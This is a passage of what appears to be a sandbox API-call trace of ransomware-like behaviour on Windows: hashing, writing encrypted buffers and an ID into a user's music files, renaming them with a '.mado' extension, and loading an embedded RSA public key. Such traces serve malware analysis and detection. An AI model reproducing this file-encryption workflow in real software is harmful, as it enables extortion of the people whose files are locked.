pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.281] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.281] GetLastError () returned 0x0 [0204.281] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.281] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.281] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.281] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.281] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe560) returned 0x3b80690 [0204.281] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e828 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e870 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1c0 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.282] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1c0 | out: hHeap=0x2c0000) returned 1 [0204.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1c0 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe190 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe178 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1c0 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.283] GetCurrentThreadId () returned 0x600 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b712d0 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.283] GetCurrentThreadId () returned 0x600 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1c0 [0204.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1d8 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1a8 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1f0 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1c0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1f0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bec8 [0204.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1a8 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1d8 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e870 | out: hHeap=0x2c0000) returned 1 [0204.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.287] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0xe550, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0xe550, lpOverlapped=0x0) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.287] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe555, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.287] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.288] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.288] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.288] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.288] CloseHandle (hObject=0x63c) returned 1 [0204.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.289] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2PCv7S.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2pcv7s.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2PCv7S.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2pcv7s.mp3.mado")) returned 1 [0204.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.290] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.291] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x194cd520, ftCreationTime.dwHighDateTime=0x1d5e0f6, ftLastAccessTime.dwLowDateTime=0x2bcbf4d0, ftLastAccessTime.dwHighDateTime=0x1d5d99c, ftLastWriteTime.dwLowDateTime=0x2bcbf4d0, ftLastWriteTime.dwHighDateTime=0x1d5d99c, nFileSizeHigh=0x0, nFileSizeLow=0x120b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VqYAySD2Zb-Kepu.wav", cAlternateFileName="5VQYAY~1.WAV")) returned 1 [0204.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.291] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5VqYAySD2Zb-Kepu.wav") returned=".wav" [0204.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5VqYAySD2Zb-Kepu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5vqyaysd2zb-kepu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.292] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=73912) returned 1 [0204.292] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.294] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12092, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.294] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.295] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.296] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x120b8, lpOverlapped=0x0) returned 1 [0204.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.296] lstrlenA (lpString="-----BEGIN PUBLIC 